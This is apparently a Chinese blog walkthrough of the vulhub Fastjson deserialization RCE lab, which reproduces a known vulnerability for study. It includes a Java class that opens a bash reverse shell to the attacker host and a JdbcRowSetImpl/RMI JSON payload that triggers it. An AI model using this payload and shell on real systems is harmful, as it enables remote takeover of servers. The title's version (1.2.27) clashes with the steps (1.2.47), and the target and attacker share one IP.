vulhub之fastjson篇-1.2.27-rce

news2024/10/7 8:22:00

一、启动环境

虚拟机:kali靶机:192.168.125.130/172.19.0.1(docker地址:172.19.0.2)

虚拟机:kali攻击机:192.168.125.130/172.19.0.1

本地MAC:172.XX.XX.XX

启动 fastjson 反序列化导致任意命令执行漏洞环境

1.进入 vulhub 的 Fastjson 1.2.47 路径

cd /../../vulhub/fastjson/1.2.47-rce

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep rce

二、漏洞利用

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c","bash -i >& /dev/tcp/192.168.125.130/4444 0>&1 &"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

将java文件编译成class文件

开启http服务

开启rmi服务

发送poc

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.125.130:9998/TouchFile",
        "autoCommit":true
    }
}